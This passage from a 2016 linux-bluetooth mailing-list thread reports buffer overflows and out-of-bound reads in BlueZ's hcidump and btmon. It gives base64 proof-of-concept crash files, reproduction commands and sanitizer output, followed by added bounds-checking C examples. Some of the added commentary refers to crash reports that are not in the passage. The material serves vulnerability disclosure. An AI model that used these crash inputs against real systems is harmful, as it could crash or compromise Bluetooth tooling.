A buffer overflow was observed in "set_mode" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
Affected code:
204 static void set_mode(int in, uint16_t handle, uint16_t cid, uint8_t mode)
205 {
206     register cid_info *table = cid_table[in];
207     register int i;
208
209     for (i = 0; i < CID_TABLE_SIZE; i++)
210         if (table[i].handle == handle && table[i].cid == cid)
211             table[i].mode = mode;
212 }
213
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==29456==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000833090 at pc 0x48d41c bp 0x7b8662e79fa0 sp 0x7b8662e79f98
WRITE of size 1 at 0x000000833090 thread T0
#0 0x48d41b in set_mode tools/parser/l2cap.c:211
#1 0x48d41b in conf_opt tools/parser/l2cap.c:657
#2 0x498a05 in conf_rsp tools/parser/l2cap.c:781
#3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x7af38a9c4b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x000000833090 is located 0 bytes to the right of global variable 'table' from 'tools/parser/cmtp.c' (0x830340) of size 11600
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:211 set_mode
==29456==ABORTING
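The hcidump reports above each trust a value taken straight from the dump file: sdp_dump dereferences frm->ptr + count before comparing count with the bytes left in the frame, read_dump hands read_n a record length larger than its 1500-byte buffer (the 3712-byte write in the report), and set_mode / set_ext_ctrl index cid_table with a first index, in, that nothing in the shown code checks. The bounds-checked counterparts below are an added example, not BlueZ code: frame_t, parse_attr_rsp, read_record, ingest and set_mode_checked are hypothetical names, the record layout and sample bytes are constructed, and treating the direction index as dump-derived is an assumption.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    const uint8_t *ptr;   /* current read position in the dump-derived bytes */
    size_t len;           /* bytes remaining from ptr */
} frame_t;

/* Little-endian u16 read that refuses to run past the end of the frame. */
static bool get_u16(frame_t *frm, uint16_t *out)
{
    if (frm->len < 2)
        return false;
    *out = (uint16_t)(frm->ptr[0] | (frm->ptr[1] << 8));
    frm->ptr += 2;
    frm->len -= 2;
    return true;
}

/* sdp_dump case: AttributeByteCount must leave room for the attribute list
 * AND the continuation-state length byte before frm->ptr + count is read.
 * Returns the continuation-state length (0..16), or -1 for a malformed frame. */
static int parse_attr_rsp(const uint8_t *data, size_t len)
{
    frame_t frm = { data, len };
    uint16_t count;
    uint8_t cont;
    if (!get_u16(&frm, &count))
        return -1;
    if ((size_t)count + 1 > frm.len)          /* the comparison sdp_dump lacks */
        return -1;
    cont = frm.ptr[count];                    /* provably inside the frame now */
    if (cont > 16 || (size_t)count + 1 + cont > frm.len)  /* SDP allows at most 16 */
        return -1;
    return cont;
}

/* read_n case. Constructed record layout (NOT hcidump's on-disk format):
 * u16 LE payload length, u8 direction, payload. The declared length is
 * checked against the input and the destination before any copy. */
#define DUMP_BUF_SIZE 1500   /* the region size in the read_n ASan report */
static int read_record(const uint8_t *dump, size_t dump_len,
                       uint8_t *buf, size_t buf_size, uint8_t *dir)
{
    uint16_t len;
    if (dump_len < 3)
        return -1;
    len = (uint16_t)(dump[0] | (dump[1] << 8));
    if (len > buf_size || (size_t)len > dump_len - 3)
        return -1;                            /* would overflow buf or overread input */
    *dir = dump[2];
    memcpy(buf, dump + 3, len);
    return len;
}

/* Ingest one record into a fixed 1500-byte buffer; returns payload length or -1. */
static int ingest(const uint8_t *dump, size_t dump_len)
{
    static uint8_t buf[DUMP_BUF_SIZE];
    uint8_t dir;
    return read_record(dump, dump_len, buf, sizeof buf, &dir);
}

/* set_mode / set_ext_ctrl case: the direction selects one of two rows, so
 * any other value is rejected before it is used as an index. */
#define DIR_COUNT 2
#define CID_TABLE_SIZE 8
typedef struct { uint16_t handle, cid; uint8_t mode; } cid_info;
static cid_info cid_table[DIR_COUNT][CID_TABLE_SIZE];

static bool set_mode_checked(unsigned in, uint16_t handle, uint16_t cid, uint8_t mode)
{
    if (in >= DIR_COUNT)
        return false;                         /* cid_table[in] would be out of bounds */
    for (int i = 0; i < CID_TABLE_SIZE; i++)
        if (cid_table[in][i].handle == handle && cid_table[in][i].cid == cid)
            cid_table[in][i].mode = mode;
    return true;
}

/* Constructed samples: one well-formed and one hostile input per pattern. */
static const uint8_t SDP_GOOD[] = { 0x03, 0x00, 0xaa, 0xbb, 0xcc, 0x00 }; /* count 3, cont 0 */
static const uint8_t SDP_BAD[]  = { 0x00, 0x40, 0xaa };                   /* count 16384 */
static const uint8_t REC_GOOD[] = { 0x02, 0x00, 0x01, 0xde, 0xad };       /* len 2, dir 1 */
static const uint8_t REC_BAD[]  = { 0x80, 0x0e, 0x00, 0x00 };             /* len 3712 > 1500 */

int main(void)
{
    printf("sdp: good=%d bad=%d\n", parse_attr_rsp(SDP_GOOD, sizeof SDP_GOOD),
           parse_attr_rsp(SDP_BAD, sizeof SDP_BAD));
    printf("record: good=%d bad=%d\n", ingest(REC_GOOD, sizeof REC_GOOD),
           ingest(REC_BAD, sizeof REC_BAD));
    printf("direction 0x2b accepted: %d\n", set_mode_checked(0x2b, 1, 0x40, 3));
    return 0;
}
```

Each rejected input is the shape ASan flagged above: a count past the frame end, a record longer than the buffer, and a direction that selects no row.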
* Re: multiple buffer overflows and out-of-bound reads
From: Luiz Augusto von Dentz @ 2016-11-15 9:18 UTC
To: op7ic \x00; +Cc: linux-bluetooth@vger.kernel.org
Hi,
On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
> Hello list,
>
> I have been playing with hcidump tool recently and came across
> following bugs coming from either out-of-bound reads or buffer
> overflows (see attached reports).
>
> There are couple more I`m working on and will send these later.
I guess we want these to be tested against btmon, hcidump is deprecated.
--
Luiz Augusto von Dentz
* Re: multiple buffer overflows and out-of-bound reads
From: op7ic \x00 @ 2016-11-15 9:25 UTC
To: Luiz Augusto von Dentz; +Cc: linux-bluetooth@vger.kernel.org
alright will do - thanks for replying.
On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
<luiz.dentz@gmail.com> wrote:
> Hi,
>
> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>> Hello list,
>>
>> I have been playing with hcidump tool recently and came across
>> following bugs coming from either out-of-bound reads or buffer
>> overflows (see attached reports).
>>
>> There are couple more I`m working on and will send these later.
>
> I guess we want these to be tested against btmon, hcidump is deprecated.
>
> --
> Luiz Augusto von Dentz
* Re: multiple buffer overflows and out-of-bound reads
From: François Beaufort @ 2016-11-15 10:41 UTC
To: op7ic \x00; +Cc: Luiz Augusto von Dentz, linux-bluetooth@vger.kernel.org
FWIW, I have been witnessing btmon buffer overflows this morning but
can't reproduce anymore.
On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> alright will do - thanks for replying.
>
> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
> <luiz.dentz@gmail.com> wrote:
>> Hi,
>>
>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>>> Hello list,
>>>
>>> I have been playing with hcidump tool recently and came across
>>> following bugs coming from either out-of-bound reads or buffer
>>> overflows (see attached reports).
>>>
>>> There are couple more I`m working on and will send these later.
>>
>> I guess we want these to be tested against btmon, hcidump is deprecated.
>>
>> --
>> Luiz Augusto von Dentz
> --
> To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at http://vger.kernel.org/majordomo-info.html
* Re: multiple buffer overflows and out-of-bound reads
From: op7ic \x00 @ 2016-11-15 10:51 UTC
To: François Beaufort
Cc: Luiz Augusto von Dentz, linux-bluetooth@vger.kernel.org
I got a couple in btmon and started looking at BO's in btmon too.
FWIW, whenever the code base is shared, similar bugs will appear. You
notice that a lot of the BO issues reported are, for example, due to
unchecked memcpy or just a lack of boundary verification on arrays, etc.
Once you hit that point, the same bug appears.
On Tue, Nov 15, 2016 at 10:41 AM, François Beaufort
<beaufort.francois@gmail.com> wrote:
> FWIW, I have been witnessing btmon buffer overflows this morning but
> can't reproduce anymore.
>
> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
>> alright will do - thanks for replying.
>>
>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
>> <luiz.dentz@gmail.com> wrote:
>>> Hi,
>>>
>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>>>> Hello list,
>>>>
>>>> I have been playing with hcidump tool recently and came across
>>>> following bugs coming from either out-of-bound reads or buffer
>>>> overflows (see attached reports).
>>>>
>>>> There are couple more I`m working on and will send these later.
>>>
>>> I guess we want these to be tested against btmon, hcidump is deprecated.
>>>
>>> --
>>> Luiz Augusto von Dentz
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at http://vger.kernel.org/majordomo-info.html
* Re: multiple buffer overflows and out-of-bound reads
From: op7ic \x00 @ 2016-11-15 11:51 UTC
To: François Beaufort
Cc: Luiz Augusto von Dentz, linux-bluetooth@vger.kernel.org
[-- Attachment #1: Type: text/plain, Size: 1742 bytes --]
Here are 4 crashes resulting in either out-of-bound reads or buffer
overflows (see attached), but this time in btmon. They are pretty
similar to the bugs reported previously.
On Tue, Nov 15, 2016 at 10:51 AM, op7ic \x00 <op7ica@gmail.com> wrote:
> I got a couple in btmon and started looking at BO's in btmon too.
>
> FWIW, whenever the code base is shared, similar bugs will appear. You
> notice that a lot of the BO issues reported are, for example, due to
> unchecked memcpy or just a lack of boundary verification on arrays, etc.
> Once you hit that point, the same bug appears.
>
>
>
>
> On Tue, Nov 15, 2016 at 10:41 AM, François Beaufort
> <beaufort.francois@gmail.com> wrote:
>> FWIW, I have been witnessing btmon buffer overflows this morning but
>> can't reproduce anymore.
>>
>> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote:
>>> alright will do - thanks for replying.
>>>
>>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
>>> <luiz.dentz@gmail.com> wrote:
>>>> Hi,
>>>>
>>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrote:
>>>>> Hello list,
>>>>>
>>>>> I have been playing with hcidump tool recently and came across
>>>>> following bugs coming from either out-of-bound reads or buffer
>>>>> overflows (see attached reports).
>>>>>
>>>>> There are couple more I`m working on and will send these later.
>>>>
>>>> I guess we want these to be tested against btmon, hcidump is deprecated.
>>>>
>>>> --
>>>> Luiz Augusto von Dentz
>>> --
>>> To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in
>>> the body of a message to majordomo@vger.kernel.org
>>> More majordomo info at http://vger.kernel.org/majordomo-info.html
[-- Attachment #2: l2cap_packet_BO.txt --]
[-- Type: text/plain, Size: 4580 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was identified in "l2cap_packet" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
AAAAGAOEAAAAABAAAAMAEAkjChgAAwP7AgMDAxADEBAJIwoYAAMD+wIDAwMQAxAAAwMDAA==
Affected code:
3161         index_list[index][in].frag_buf = malloc(len);
3162         if (!index_list[index][in].frag_buf) {
3163             print_text(COLOR_ERROR, "failed buffer allocation");
3164             packet_hexdump(data, size);
3165             return;
3166         }
3167
3168         memcpy(index_list[index][in].frag_buf, data, size);
3169         index_list[index][in].frag_pos = size;
3170         index_list[index][in].frag_len = len - size;
3171         index_list[index][in].frag_cid = cid;
3172         break;
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
=================================================================
==27023==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x76cf40a9c2c2 at pc 0x679d7a177792 bp 0x76cf40a9b830 sp 0x76cf40a9aff0
READ of size 4095 at 0x76cf40a9c2c2 thread T0
< HCI Command: Unknown (0x00|0x0003) plen 16 [hci0] 0.004096
09 23 0a 18 00 03 03 fb 02 03 03 03 .#..........
< ACL Data TX: Handle 771 flags 0x00 dlen 4099 [hci0] 94308888.197627
#0 0x679d7a177791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
#1 0x4b9ecc in l2cap_packet monitor/l2cap.c:3168
#2 0x47dda6 in packet_hci_acldata monitor/packet.c:9115
#3 0x483777 in packet_monitor monitor/packet.c:3846
#4 0x417f68 in control_reader monitor/control.c:1415
#5 0x40a142 in main monitor/main.c:220
#6 0x679d79bb0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x76cf40a9c2c2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
==27023==ABORTING
[-- Attachment #3: packet_hexdump_OOB.txt --]
[-- Type: text/plain, Size: 9830 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bound read was identified in "packet_hexdump" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
AACACQQHGAAaERDoAwAAAAkjBxgAAwMDAwMDAwMDAwMDAwMDAwMDAw==
Affected code:
3736     static const char hexdigits[] = "0123456789abcdef";
3737     char str[68];
3738     uint16_t i;
3739
3740     if (!len)
3741         return;
3742
3743     for (i = 0; i < len; i++) {
3744         str[((i % 16) * 3) + 0] = hexdigits[buf[i] >> 4];
3745         str[((i % 16) * 3) + 1] = hexdigits[buf[i] & 0xf];
3746         str[((i % 16) * 3) + 2] = ' ';
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==13306==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x79fe1636c7e2 at pc 0x42cb3c bp 0x79fe1636bca0 sp 0x79fe1636bc98
READ of size 1 at 0x79fe1636c7e2 thread T0
> ACL Data RX: Handle 0 flags 0x00 dlen 2304 [hci0] 0.437326056
invalid packet size (32764 != 2304)
23 07 18 00 03 03 03 03 03 03 03 03 03 03 03 03 #...............
03 03 03 03 03 03 03 00 00 00 00 00 20 08 82 40 ............ ..@
00 28 80 20 00 00 00 00 40 01 40 23 00 00 00 00 .(. ....@.@#....
a0 04 20 00 00 00 00 00 00 04 00 80 00 00 00 00 .. .............
00 00 10 04 ff ff ff ff 04 01 04 86 9a 39 1c 20 .............9.
54 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Tp..............
00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
ff ff ff ff 04 00 00 00 4c 00 00 00 00 00 00 00 ........L.......
00 00 00 00 9a 39 1c 20 54 70 00 00 00 00 00 00 .....9. Tp......
00 00 00 00 56 98 54 00 00 00 00 00 80 c8 36 00 ....V.T.......6.
00 00 00 00 1b 00 00 00 00 00 00 00 59 98 54 00 ............Y.T.
00 00 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .......!Tp....2.
54 70 00 00 62 53 61 21 54 70 00 00 00 00 00 00 Tp..bSa!Tp......
00 00 00 00 74 78 61 21 54 70 00 00 80 c5 36 16 ....txa!Tp....6.
fe 79 00 00 00 b0 82 21 54 70 00 00 00 00 00 00 .y.....!Tp......
00 00 00 00 08 00 00 00 30 00 00 00 50 c8 36 16 ........0...P.6.
fe 79 00 00 90 c7 36 16 fe 79 00 00 50 f8 1d 20 .y....6..y..P..
54 70 00 00 a0 e2 51 20 54 70 00 00 00 00 00 00 Tp....Q Tp......
00 00 00 00 00 00 00 00 00 00 00 00 18 c8 36 16 ..............6.
fe 79 00 00 17 c8 36 16 fe 79 00 00 34 c3 36 16 .y....6..y..4.6.
fe 79 00 00 00 00 00 00 00 00 00 00 00 00 00 91 .y..............
6d 2c fc f3 01 00 00 00 00 00 00 00 80 c5 36 16 m,............6.
fe 79 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .y.....!Tp....2.
54 70 00 00 00 00 e0 85 6d 2c fc f3 00 00 c2 f0 Tp......m,......
c2 42 a8 e0 00 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
fe 79 00 00 b8 79 82 21 54 70 00 00 51 45 52 20 .y...y.!Tp..QER
54 70 00 00 00 00 40 86 6d 2c fc f3 00 00 c2 f0 Tp....@.m,......
c2 42 a8 e0 06 00 00 00 00 00 00 00 80 c5 36 16 .B............6.
fe 79 00 00 05 16 62 21 54 70 00 00 89 53 74 20 .y....b!Tp...St
54 70 00 00 c8 86 81 21 54 70 00 00 01 00 00 00 Tp.....!Tp......
00 00 00 00 80 c8 36 16 fe 79 00 00 98 86 81 21 ......6..y.....!
54 70 00 00 9b 5b 61 21 54 70 00 00 00 00 01 00 Tp...[a!Tp......
01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 ................
01 00 00 00 35 63 61 21 54 70 00 00 01 00 00 00 ....5ca!Tp......
fe 79 00 00 00 80 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
00 00 00 00 28 ea 9c 20 54 70 00 00 68 0a 73 20 ....(.. Tp..h.s
54 70 00 00 b5 55 61 21 54 70 00 00 01 00 00 00 Tp...Ua!Tp......
fe 79 00 00 d8 99 81 21 54 70 00 00 30 c4 36 16 .y.....!Tp..0.6.
fe 79 00 00 1c 1c 61 21 54 70 00 00 a8 e8 9c 20 .y....a!Tp.....
54 70 00 00 1c 1c 61 21 54 70 00 00 03 00 00 00 Tp....a!Tp......
00 00 00 00 2e 03 31 1c 00 00 00 00 03 00 00 00 ......1.........
00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
54 70 00 00 8e 25 61 21 54 70 00 00 28 bd 17 20 Tp...%a!Tp..(..
54 70 00 00 00 c5 36 16 fe 79 00 00 28 bd 17 20 Tp....6..y..(..
54 70 00 00 48 c1 17 20 54 70 00 00 10 c6 36 16 Tp..H.. Tp....6.
fe 79 00 00 0c c4 70 00 00 00 00 00 00 c6 36 16 .y....p.......6.
fe 79 00 00 80 87 81 21 54 70 00 00 00 00 00 00 .y.....!Tp......
00 00 00 00 80 87 81 21 54 70 00 00 00 a0 81 21 .......!Tp.....!
54 70 00 00 04 14 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
54 70 00 00 70 0a 40 00 00 00 00 00 00 00 00 00 Tp..p.@.........
01 00 00 00 2c 00 00 00 01 00 00 00 90 c6 36 16 ....,.........6.
fe 79 00 00 80 87 81 21 54 70 00 00 a0 c6 36 16 .y.....!Tp....6.
fe 79 00 00 00 b5 82 21 54 70 00 00 c8 c6 36 16 .y.....!Tp....6.
fe 79 00 00 a8 b1 82 21 54 70 00 00 01 00 00 00 .y.....!Tp......
00 00 00 00 3d 27 61 21 54 70 00 00 00 00 00 00 ....='a!Tp......
00 00 00 00 80 87 81 21 54 70 00 00 01 00 00 00 .......!Tp......
54 70 00 00 00 00 00 00 00 00 00 00 01 00 00 00 Tp..............
00 00 00 00 a8 b1 82 21 54 70 00 00 03 00 00 00 .......!Tp......
00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............!
54 70 00 00 8e 25 61 21 54 70 00 00 00 00 00 00 Tp...%a!Tp......
00 00 00 00 00 b5 82 21 54 70 00 00 10 c6 36 16 .......!Tp....6.
fe 79 00 00 00 c6 36 16 fe 79 00 00 2e 03 31 1c .y....6..y....1.
00 00 00 00 04 14 40 00 00 00 00 00 ff ff ff ff ......@.........
00 00 00 00 20 0f 40 00 00 00 00 00 48 c1 17 20 .... .@.....H..
54 70 00 00 00 a0 81 21 54 70 00 00 00 a0 81 21 Tp.....!Tp.....!
54 70 00 00 da 15 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
54 70 00 00 38 03 40 00 00 00 00 00 00 00 00 00 Tp..8.@.........
01 00 00 00 54 02 00 00 01 00 00 00 01 00 00 00 ....T...........
00 00 00 00 80 87 81 21 54 70 00 00 b0 c7 36 16 .......!Tp....6.
fe 79 00 00 00 b5 82 21 54 70 00 00 d8 c7 36 16 .y.....!Tp....6.
fe 79 00 00 e8 56 7d 00 00 00 00 00 00 00 00 00 .y...V}.........
00 00 00 00 00 00 00 00 00 00 00 00 f0 ef 00 00 ................
20 60 00 00 00 00 00 00 00 00 00 00 00 c8 36 16 `............6.
fe 79 00 00 c7 6d 61 21 54 70 00 00 01 00 00 00 .y...ma!Tp......
#0 0x42cb3b in packet_hexdump monitor/packet.c:3744
#1 0x47dd2b in packet_hexdump monitor/packet.c:3740
#2 0x47dd2b in packet_hci_acldata monitor/packet.c:9108
#3 0x483752 in packet_monitor monitor/packet.c:3849
#4 0x417f68 in control_reader monitor/control.c:1415
#5 0x40a142 in main monitor/main.c:220
#6 0x705420199b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x79fe1636c7e2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:3744 packet_hexdump
Shadow bytes around the buggy address:
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==13306==ABORTING
[-- Attachment #4: pklg_read_hci_BO.txt --]
[-- Type: text/plain, Size: 5837 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A buffer overflow was observed in "pklg_read_hci" function in "btsnoop.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
Affected code:
368 *index = 0xffff;
369 *opcode = 0xffff;
370 break;
371 }
372
373 len = read(btsnoop->fd, data, toread);
374 if (len < 0) {
375 btsnoop->aborted = true;
376 return false;
377 }
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
=================================================================
==1986==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x73f4d87b94c2 at pc 0x663b1aef59b6 bp 0x73f4d87b8c50 sp 0x73f4d87b8c38
WRITE of size 1491 at 0x73f4d87b94c2 thread T0
#0 0x663b1aef59b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5)
#1 0x544a17 in pklg_read_hci src/shared/btsnoop.c:373
#2 0x544a17 in btsnoop_read_hci src/shared/btsnoop.c:433
#3 0x417efd in control_reader monitor/control.c:1408
#4 0x40a142 in main monitor/main.c:220
#5 0x663b1a933b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#6 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x73f4d87b94c2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 read
Shadow bytes around the buggy address:
==1986==ABORTING
[-- Attachment #5: print_hex_field_OOB.txt --]
[-- Type: text/plain, Size: 4023 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bound read was identified in "print_hex_field" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./monitor/btmon -r <PoC File>
PoC.file base64 encoded:
AAAADCQkLv9/AIAAARUB3QAAAAwdJCT/f4gAAQE=
Affected code:
1908 static void print_hex_field(const char *label, const uint8_t *data,
1909 uint8_t len)
1910 {
1911 char str[len * 2 + 1];
1912 uint8_t i;
1913
1914 str[0] = '\0';
1915
1916 for (i = 0; i < len; i++)
1917 sprintf(str + (i * 2), "%2.2x", data[i]);
1918
Repeat-By:
echo <above base64> > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./monitor/btmon -r PoC.file
ASAN Report (bluez needs to be compiled with -fsanitize=address for this):
==17737==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x77c32d2411a2 at pc 0x431421 bp 0x77c32d240700 sp 0x77c32d2406f8
READ of size 1 at 0x77c32d2411a2 thread T0
#0 0x431420 in print_hex_field monitor/packet.c:1917
#1 0x44428d in print_key monitor/packet.c:1924
#2 0x44428d in print_link_key monitor/packet.c:1929
#3 0x44428d in return_link_keys_evt monitor/packet.c:7803
#4 0x47d5f8 in packet_hci_event monitor/packet.c:9072
#5 0x483025 in packet_monitor monitor/packet.c:3843
#6 0x417f68 in control_reader monitor/control.c:1415
#7 0x40a142 in main monitor/main.c:220
#8 0x74bb760f0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#9 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
Address 0x77c32d2411a2 is located in stack of thread T0 at offset 1778 in frame
#0 0x417b4f in control_reader monitor/control.c:1375
This frame has 5 object(s):
[32, 34) 'pktlen'
[96, 98) 'index'
[160, 162) 'frequency'
[224, 240) 'tv'
[288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:1917 print_hex_field
Shadow bytes around the buggy address:
==17737==ABORTING
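The btmon reports above share one root cause: a length taken from the capture file is trusted before it is compared with the destination buffer (toread in pklg_read_hci, len in packet_hexdump and print_hex_field). What follows is an added example written for this page, not BlueZ code: a bounded record reader with a hypothetical 5-byte header (big-endian length counting the type byte, then the type byte) and a constructed 16-byte destination buffer. It refuses oversized records before any read() and treats a short read or a mid-record EOF as truncation, which the quoted "if (len < 0)" check alone does not catch.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

/* Hypothetical record header, constructed for this example (not the real
 * pklg layout): 4-byte big-endian length covering the type byte plus the
 * payload, then a 1-byte packet type; the payload follows. */
#define HDR_LEN 5
#define DATA_BUF 16   /* deliberately small so the oversize case is visible */

enum read_status { REC_OK = 0, REC_EOF, REC_BAD_HDR, REC_TOO_LARGE,
                   REC_TRUNCATED, REC_IO };

struct result {
    enum read_status status;
    uint8_t type;
    uint16_t len;   /* payload bytes actually placed in the caller's buffer */
};

static struct result fail(enum read_status s)
{
    struct result res = { s, 0, 0 };
    return res;
}

/* read(2) may hand back fewer bytes than requested: loop until n arrive. */
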